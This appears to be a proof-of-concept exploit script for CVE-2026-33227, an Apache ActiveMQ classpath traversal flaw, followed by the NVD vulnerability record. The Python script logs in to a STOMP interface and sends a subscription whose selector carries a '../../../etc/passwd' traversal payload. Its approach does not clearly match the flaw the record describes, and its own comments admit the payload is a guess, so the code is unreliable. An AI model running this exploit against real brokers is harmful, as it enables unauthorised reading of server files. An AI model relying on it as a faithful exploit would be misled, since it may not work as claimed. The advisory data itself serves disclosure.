CVE-2026-33227

import stomp # Target configuration target_host = '192.168.1.100' target_port = 61613 username = 'user' password = 'password' # Connect to ActiveMQ Stomp interface conn = stomp.Connection([(target_host, target_port)]) conn.connect(username, password, wait=True) # Vulnerability Explanation: # The application does not properly validate the 'key' parameter used in message selectors. # By injecting path traversal sequences (e.g., '../../'), an attacker can read files from the classpath. # Malicious payload attempting to read a configuration file from the classpath # The exact payload depends on the specific endpoint and classpath structure malicious_key = "../../../etc/passwd" # Example: SUBSCRIBE frame with a selector containing the traversal payload # In a real scenario, this might be part of a message header or consumer configuration headers = { 'selector': f"key = '{malicious_key}'", 'activemq.prefetchSize': '1' } try: # Send a subscription request that triggers the vulnerable path concatenation conn.subscribe(destination='/queue/TestQueue', id='1', headers=headers) print("[+] PoC sent: Malicious subscription request with path traversal payload.") print("[+] Check application response or server logs for file content inclusion.") except Exception as e: print(f"[-] Exploit failed: {e}") finally: conn.disconnect()

{"cve": {"id": "CVE-2026-33227", "sourceIdentifier": "[email protected]", "published": "2026-04-07T09:16:20.750", "lastModified": "2026-04-20T16:50:36.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper validation and restriction of a classpath path name vulnerability in \n\n Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web, Apache ActiveMQ.\n\n\n\nIn two instances (when creating a Stomp consumer and also browsing messages in the Web console) an authenticated user provided \"key\" value could be constructed to traverse the classpath due to path concatenation. As a result, the application is exposed to a classpath path resource loading vulnerability that could potentially be chained together with another attack to lead to exploit.\n\n\n\n\n\nThis issue affects Apache ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2.\n\nUsers are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that is limited to non-Windows environments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.3", "matchCriteriaId": "7442A37C-AACC-4BF1-8AB7-1B4FBDE44CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.2", "matchCriteriaId": "313BB84A-138D-43C8-B265-F789A4BED361"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.3", "matchCriteriaId": "B4342B2A-3F2C-4016-87FB-66D69685FEA0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.2", "matchCriteriaId": "97120890-1D2D-4021-BF6D-362CEB57E13B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_web:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.19.3", "matchCriteriaId": "0489A0FD-BF30-47A7-8AB7-19260119ABF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.2.2", "matchCriteriaId": "EF252D19-2B2F-41ED-A2D6-1C4AC2CDCF37"}]}]}], "references": [{"url": "https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/06/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}